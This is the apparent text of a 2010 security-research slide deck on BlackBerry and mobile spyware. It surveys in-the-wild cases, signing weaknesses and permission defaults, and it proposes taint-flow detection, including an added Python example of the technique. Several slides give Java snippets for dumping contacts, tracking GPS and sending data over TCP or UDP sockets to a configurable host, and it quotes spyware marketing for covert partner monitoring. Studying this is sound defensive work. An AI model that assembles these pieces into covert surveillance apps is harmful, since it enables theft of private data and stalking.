The Monkey Steals the Berries 



Mobile Malware - The State of Mobile Security 
Presenter Background

■ Currently 

- Sr. Security Researcher, Veracode, Inc.

■ Previously 

- Security Consultant - Symantec 

- Security Consultant - @Stake 

- Incident Response and Forensics Handler

■ Wishes He Was 

- Infinitely rich 

- Able to leap tall buildings in a single bound

- Smarter than the average bear 
■ Detecting Malicious Mobile Applications

■ Mitigation

Background

Malicious Mobile Applications

■ Often includes modifications to legitimate programs designed to compromise the device or device data

■ Often inserted by those who have legitimate access to source code or distribution binaries

■ May be intentional or inadvertent

■ Not specific to any particular programming language

■ Not specific to any particular mobile Operating System
Attacker Motivation

Attacker Motivation

■ Practical method of compromise for many systems

- Let the users install your backdoor on systems you have no access to

- Looks like legitimate software so may bypass mobile AV

■ Retrieve and manipulate valuable private data

- Looks like legitimate application traffic so little risk of detection

■ For high value targets such as financial services and government it becomes cost effective and more reliable

- High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation

- Think "Aurora" for Mobile Devices
Units Sold Market Growth

iPhone Applications Sold

(Chart) Data Source: Gartner, Inc., a research and advisory firm
Back To The Future
Back Orifice v 2000 








Malicious Mobile Applications In The Wild 
FlexiSpy

■ http://www.flexispy.com 

■ $149 - $350 PER YEAR depending on features 

■ Features 

- Remote Listening 

- C&C Over SMS 

- SMS and Email Logging 

- Call History Logging 

- Location Tracking 

- Call Interception 

- GPS Tracking 

- Symbian, Blackberry, Windows Mobile Supported 
FlexiSpy Web Site Quotes



"Download FlexiSPY spyphone software directly onto a mobile 
phone and receive copies of SMS, Call Logs, Emails, Locations and 
listen to conversations within minutes of purchase. " 

"Catch cheating wives or cheating husbands , stop employee 
espionage, protect children, make automatic backups, bug meetings 
rooms etc." 

"F Secure seem to think that its ok for them to interfere with 
legitimate, legal and accountable software. Who appointed them 
judge, jury and executioner anyway, and why wont they answer our 
emails, so we have to ask who is the real malware ? Here is how to 
remove FSecure malware from your device . Please don't believe the 
fsecure fear mongers who simply wish you to buy their products." 
Mobile Spy

■ http://www.mobile-spy.com

■ $49.97 PER QUARTER or $99.97 PER YEAR

■ Features

- SMS Logging

- Call Logging

- GPS Logging

- Web URL Logging

- BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian
Mobile Spy Web Site Quotes

"This high-tech spy software will allow you to see exactly what they
do while you are away. Are your kids texting while driving or using
the phone in all hours of the night? Are your employees sending
company secrets? Do they erase their phone logs?"

"Our software is not for use on a phone you do not own or have 
proper permission to monitor from the user or owner. You must 
always follow all applicable laws and regulations in your region." 

"Purchased by more than 30,000 customers in over 150 countries" 
Etisalat (SS8)

■ Cell carrier in United Arab Emirates (UAE)

■ Pushed via SMS as "software patch" for Blackberry smartphones

■ Upgrade urged to "enhance performance" of Blackberry service

■ Blackberry PIN messaging as C&C

■ Sets FLAG_HIDDEN bit to true

■ Interception of outbound email / SMS only

■ Discovered because the flooded listener server caused retries that drained the batteries of affected devices

■ Accidentally released the .jar as well as the .cod (ooopsie?!)
Storm8 Phone Number Farming

■ iMobsters and Vampires Live (and others) 

■ "Storm8 has written the software for all its games in such a way that 
it automatically accesses, collects, and transmits the wireless 
telephone number of each iPhone user who downloads any Storm8 
game," the suit alleges. " ... Storm8, though, has no reason 
whatsoever to access the wireless phone numbers of the iPhones on 
which its games are installed." 

■ "Storm8 says that this code was used in development tests, only 
inadvertently remained in production builds, and removed as soon as 
it was alerted to the issue." 

- These were available via the iTunes App Store! 

■ http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html
Symbian Sexy Space

■ Poses as legitimate server ACSServer.exe

■ Calls itself 'Sexy Space'

■ Steals phone and network information

■ Exfiltrates data via hacker owned web site connection

■ Can SPAM contact list members

■ Basically a "botnet" for mobile phones

■ Signing process

- Anti-virus scan using F-Secure

■ Approx 43% proactive detection rate (PCWorld)

- Random selection of inbound manually assessed

■ Symbian signed this binary as safe!

http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm
Symbian MergoSMS

■ The worm spreads as self-signed (untrusted) SIS installers

■ Installer contains sub-SIS installers, some of them signed by Symbian.

■ Spreads by sending text messages

- Contain variable messages in Chinese and a link to a website

- Going to link results in worm download

■ On phone reboot malware runs, downloads worm payload, completing infection

■ The worm was spread on Chinese file sharing web sites

■ Originally spread as games, themes, etc. for Symbian Series60 3rd & 5th edition phones.

http://www.f-secure.com/v-descs/trojan_symbos_mergosms.shtml
09Droid - Banking Applications Attack

■ Droid app that masquerades as any number of different target banking applications

■ Target banks included

- Royal Bank of Canada

- Chase

- BB&T

- SunTrust

- Over 50 total financial institutions were affected

■ May steal and exfiltrate banking credentials

■ Approved and downloaded from Google's Android Marketplace!

http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps-market

http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953

http://www.f-secure.com/weblog/archives/00001852.html
3D Anti-Terrorist / PDA Poker Art / Codec Pack WM1.0

■ Games available on legitimate application download sites 

■ Originally written by Chinese company Huike 

■ Repackaged in Russia by unknown authors to include malware 

■ Calls premium rate 800 numbers 

■ Three days idle before first dial 

■ Idles one month between subsequent outbound dialing 

- Distributed via common Windows Mobile shareware sites 



http://www.eweek.com/c/a/Security/Malware-Hidden-in-Windows-Mobile-Applications-424076/
Mobile Security Mechanisms

Does It Really Matter?!



Only 23% of smartphone owners use the security software 
installed on the devices. 

(Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 

13% of organizations currently protect from mobile viruses 

(Mobile Security 2009 Survey by Goode Intelligence) 
Common Mobile Security Mechanisms



Corporate level security policies 

■ Applied at the corporate IT level 

■ Can't be modified by a lower level security mechanism 

Application level security policies 

■ May be pushed down from corporate policy 

■ Otherwise applied at handset itself 

■ Restricts access to specific resources 

■ Sandboxing 

■ Code Signing 
Common Mobile Security Mechanisms



Mobile Anti-Virus 

■ Implemented at the handset itself 

■ Fails due to the same reasons PC antivirus is failing today 

Application market place security screening 

■ Applied by the marketplace owner 

■ Currently opaque and ill defined 

■ Misplaced trust already acquired 
Code Signing

■ Subset of Blackberry API considered "controlled" 

■ Use of controlled package, class, or method requires appropriate 
code signature 

■ Blackberry Signature Tool comes with the Blackberry JDE 

■ Acquire signing keys by filling out a web form and paying $20 

- This is not a high barrier to entry

- 48 hours later you receive signing keys 

■ Install keys into signature tool 
Code Signing Process

■ Hash of code sent to RIM for API tracking purposes only 

■ RIM does not get source code 

■ COD file is signed based on required keys 

■ Application ready to be deployed 

■ Easy to acquire anonymous keys 
Blackberry IT Policies

■ Requires connection to Blackberry Enterprise Server (BES)

■ Supersedes lower levels of security restrictions

■ Can prevent devices from downloading third-party applications over wireless

■ Prevent installation of specific third-party applications

■ Control permissions of third party applications

- Allow Internal Connections

- Allow Third-Party Apps to Use Serial Port

- Allow External Connections

■ MOSTLY "Default Allow All" policy for BES and non-BES devices

© 2010 Veracode, Inc.

Blackberry Application Policies

■ Can be controlled at the BES

■ If no BES present, controls are set on the handheld itself

■ Can only be MORE restrictive than the IT policy, never less

■ Control individual resource access per application

■ Control individual connection access per application

■ MOSTLY "Default Allow All" policy for BES and non-BES devices
V4.7.0.148 Default 3rd Party Application Permissions

V5.0.0.328 Default 3rd Party Application Permissions

V5.0.0.328 Trusted 3rd Party Application Permissions

Potential Effects and Behaviors

Installation Methods



■ Accessing a web site using the mobile browser and choosing to download the application over the network (OTA Installation)

■ Running the application loader tool on the desktop system and choosing to download the application onto the device using a physical connection to the computer

■ Using enterprise management solutions to push the application to the entire user community

■ Get it into the global application marketplace and let the user choose to install it for you!
Logging and Dumping

■ Monitor connected / disconnected calls

■ Monitor PIM added / removed / updated

■ Monitor inbound SMS

■ Monitor outbound SMS

■ Real Time track GPS coordinates

■ Dump all contacts

■ Dump current location

■ Dump phone logs

■ Dump email

■ Dump microphone capture (security prompted)
Exfiltration and C&C Methods

■ SMS (No CDMA)

■ SMS Datagrams (Supports CDMA)

■ Email

■ HTTP GET

■ HTTP POST

■ TCP Socket

■ UDP Socket

■ DNS Exfiltration

■ Default command and control to inbound SMS

■ TXSPROTO Bidirectional TCP based command and control

(Architecture diagram: Data Dumpers, Listeners, Exfiltration Methods, Command and Control)
Command and Control Channels

■ initCandC(int a) 

- Initializes inbound SMS listener if passed a == 1 

- Kills spyware otherwise 

- Listens for commands and acts accordingly 
Dump Contact Information

■ API

- javax.microedition.pim

- net.rim.blackberry.api.pdap

■ Pseudocode

    import java.util.Enumeration;
    import javax.microedition.pim.Contact;
    import javax.microedition.pim.PIM;
    import net.rim.blackberry.api.pdap.BlackBerryPIMList;

    // Open the device contact list read-only (openPIMList throws PIMException)
    PIM pim = PIM.getInstance();
    BlackBerryPIMList contacts = (BlackBerryPIMList)
        pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);

    // Walk every contact and read its first e-mail address, if the list
    // supports the field and the contact has at least one value for it
    Enumeration eContacts = contacts.items();
    while (eContacts.hasMoreElements()) {
        Contact contact = (Contact) eContacts.nextElement();
        if (contacts.isSupportedField(Contact.EMAIL)
                && contact.countValues(Contact.EMAIL) > 0) {
            String email = contact.getString(Contact.EMAIL, 0);
        }
    }
Location Listener

■ Create the class that implements LocationListener Interface

■ Get LocationProvider instance

■ Add LocationListener

■ API

- javax.microedition.location.LocationProvider.getInstance

- javax.microedition.location.LocationProvider.setLocationListener

■ Pseudocode

    import javax.microedition.location.LocationListener;
    import javax.microedition.location.LocationProvider;

    // LocListener is the application's own class implementing LocationListener
    LocationListener ll = new LocListener();
    // null criteria = any available provider; throws LocationException if none
    LocationProvider lp = LocationProvider.getInstance(null);
    // interval, timeout and maxAge of 1 second each
    lp.setLocationListener(ll, 1, 1, 1);
TCP/UDP Exfiltration

■ API

- javax.microedition.io.StreamConnection

- javax.microedition.io.DatagramConnection

■ Pseudocode

    import java.io.OutputStreamWriter;
    import javax.microedition.io.Connector;
    import javax.microedition.io.Datagram;
    import javax.microedition.io.DatagramConnection;
    import javax.microedition.io.StreamConnection;

    // TCP: direct (deviceside) socket to the configured host and port
    StreamConnection conn = (StreamConnection) Connector.open(
        "socket://" + this.ip + ":" + this.port + ";deviceside=true");
    OutputStreamWriter out = new OutputStreamWriter(conn.openOutputStream());
    out.write(msg, 0, length);
    out.flush();
    conn.close();

    // UDP: datagram connection to the same host and port, local port 4444
    DatagramConnection dconn = (DatagramConnection) Connector.open(
        "udp://" + this.ip + ":" + this.port + ";4444");
    Datagram dg = dconn.newDatagram(buf, buf.length);
    dg.setData(buf, 0, buf.length);
    dconn.send(dg);
    dconn.close();
Detecting Malicious Mobile Code

Detecting Malicious Mobile Code

■ Signature Based Detection 

- This is how the current anti-virus world is failing 

- Requires "known" signatures for detection 

- Too reactive - broken 

■ Resource Usage White Listing 

- Require individual configuration and white listing of resources 

- Make it fine grained enough to be effective 

- Balancing act resulting in user complaints about ease of use 

- People just click ok - semi broken 
Detecting Malicious Mobile Code

■ Sandbox Based Execution Heuristics 

- Run the application and detect malicious activity 

- Requires execution in a sandbox and is reactive 

- Can't ensure complete execution 

- Also semi broken 
Mobile Malicious Code Detection

■ Enumerate Mobile Sensitive Taint Sources

- Sources of potentially private information

- This is what the attacker is stealing

■ Enumeration of Mobile Exfiltration Methods

- Methods by which data can be transferred off the mobile device

- How the attacker is sending your data out

■ Code Flow Tracing

- Follow data from taint source to exfiltration sink

- Annotate the existence of potential exfiltration

- Confirm against expected exfiltration of program
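Code-flow tracing of the kind this slide describes, as an added example (not Veracode's tooling and not code from the deck): a small Python taint tracker that runs over simplified decompiled Java, one statement per line, follows private data from a taint source to an exfiltration sink across method calls, and diffs the flows it finds against the exfiltration the application is expected to perform. The source and sink API names (PIM, LocationProvider, Connector socket/udp URLs) come from the deck's own pseudocode slides; the sample application, its method names, the substring matching on Connector URLs and the expected-exfiltration allow-list are assumptions of this example.

```python
import re

# Taint sources: calls whose result is private device data
# (substring of the call -> data label).  Names from the deck's slides.
TAINT_SOURCES = {
    "openPIMList(PIM.CONTACT_LIST": "contacts",
    "getString(Contact.EMAIL": "contacts",
    "LocationProvider.getInstance(": "location",
}

# Channel openers: Connector URLs that create an outbound channel
# (substring of the call -> channel label).  Simplified: literal URLs only.
CHANNEL_OPENERS = {
    'Connector.open("socket://': "tcp_socket",
    'Connector.open("udp://': "udp_datagram",
    'Connector.open("sms://': "sms",
}

IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
ASSIGN = re.compile(r"^(?:[\w<>\[\]]+\s+)?(\w+)\s*=\s*(.+);$")   # [Type] var = expr;
CALL = re.compile(r"^(?:(\w+)\.)?(\w+)\((.*)\);$")               # [recv.]method(args);
NOISE = {"new", "null", "true", "false", "this", "return"}


def idents(expr):
    """Identifiers referenced by an expression (only tracked names matter)."""
    return set(IDENT.findall(expr)) - NOISE


def labels_of(expr, taint):
    """Union of the taint labels carried by any identifier in expr."""
    labs = set()
    for v in idents(expr):
        labs |= taint.get(v, set())
    return labs


def trace_method(app, name, taint, chan, flows, seen):
    """Walk one method under a given taint state, recording a
    (data label, channel, method) flow for every tainted write to a channel."""
    key = (name, frozenset((v, frozenset(l)) for v, l in taint.items()),
           frozenset(chan.items()))
    if key in seen:                      # already analysed in this state
        return
    seen.add(key)
    for stmt in app[name]["body"]:
        m = ASSIGN.match(stmt)
        if m:                            # assignment: propagate taint/channel to LHS
            var, rhs = m.groups()
            labs = {lab for src, lab in TAINT_SOURCES.items() if src in rhs}
            labs |= labels_of(rhs, taint)
            if labs:
                taint[var] = labs
            for pat, ch in CHANNEL_OPENERS.items():
                if pat in rhs:
                    chan[var] = ch
            for v in idents(rhs):        # e.g. a writer wrapped around a socket
                if v in chan:
                    chan[var] = chan[v]
            continue
        c = CALL.match(stmt)
        if not c:
            continue
        recv, meth, args = c.groups()
        tainted = labels_of(args, taint)
        if recv in chan and tainted:     # sink: tainted data leaves on a channel
            for lab in tainted:
                flows.add((lab, chan[recv], name))
        elif recv is None and meth in app:   # call into another app method
            arg_list = [a.strip() for a in args.split(",")] if args.strip() else []
            callee_taint = {}
            for p, a in zip(app[meth]["params"], arg_list):
                labs = labels_of(a, taint)
                if labs:
                    callee_taint[p] = labs
            trace_method(app, meth, callee_taint, {}, flows, seen)


def find_flows(app, entry_points=None):
    """All (label, channel, method) flows reachable from the entry points."""
    flows, seen = set(), set()
    for name in (entry_points or list(app)):
        trace_method(app, name, {}, {}, flows, seen)
    return flows


def unexpected_flows(app, expected):
    """Flows not covered by the declared (label, channel) allow-list: the
    'confirm against expected exfiltration of program' step."""
    return {f for f in find_flows(app) if (f[0], f[1]) not in expected}


# Constructed sample application, modelled on the deck's pseudocode slides.
SAMPLE_APP = {
    "shareLocation": {"params": [], "body": [
        "LocationProvider lp = LocationProvider.getInstance(null);",
        "Location loc = lp.getLocation(60);",
        "String pos = loc.getQualifiedCoordinates().toString();",
        "exfil(pos);",
    ]},
    "dumpContacts": {"params": [], "body": [
        "PIM pim = PIM.getInstance();",
        "BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY);",
        "Enumeration eContacts = contacts.items();",
        "Contact contact = (Contact) eContacts.nextElement();",
        "String email = contact.getString(Contact.EMAIL, 0);",
        "exfil(email);",
    ]},
    "checkUpdate": {"params": [], "body": [      # untainted write: no flow
        'StreamConnection conn = (StreamConnection) Connector.open("socket://" + ip + ":" + port);',
        "OutputStreamWriter out = new OutputStreamWriter(conn.openOutputStream());",
        'out.write("GET /version");',
    ]},
    "exfil": {"params": ["msg"], "body": [
        'StreamConnection conn = (StreamConnection) Connector.open("socket://" + ip + ":" + port + ";deviceside=true");',
        "OutputStreamWriter out = new OutputStreamWriter(conn.openOutputStream());",
        "out.write(msg, 0, msg.length());",
    ]},
}

# Declared purpose: a location-sharing client, so location over TCP is expected.
EXPECTED_EXFIL = {("location", "tcp_socket")}

if __name__ == "__main__":
    for flow in sorted(unexpected_flows(SAMPLE_APP, EXPECTED_EXFIL)):
        print("UNEXPECTED: %s -> %s in %s()" % flow)
```

Run as a script it reports the contacts-to-socket flow hidden in dumpContacts() and stays silent on the declared location flow and on the untainted version check, which is the annotate-then-confirm workflow of the slide. Taint and channel labels propagate through plain assignments and through wrapping (the writer built on the socket inherits the socket's channel), and calls into the application's own methods map arguments onto parameters so the sink inside exfil() is attributed to whichever data reached it.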
Defense in Depth

■ Do all of the above!

■ Implement and enforce strong IT policies

■ Implement and enforce additional application policies as required

■ Implement a best of breed anti-virus solution

- If only for thoroughness of deployed options

■ Utilize static decompilation and analysis of applications considered for deployment
Demonstration

Conclusion

■ We are currently trusting the vendor application store provider for the majority of our mobile device security

■ Minimal methods of real time eradication or detection of spyware type activities exist

■ When they do exist they are not configured correctly (or at all)

■ No easy/automated way to confirm for ourselves what the applications are actually doing

■ Automate the decompilation and static analysis of applications that are required for the ongoing functioning of your business
The Monkey Steals the Berries!

Questions? 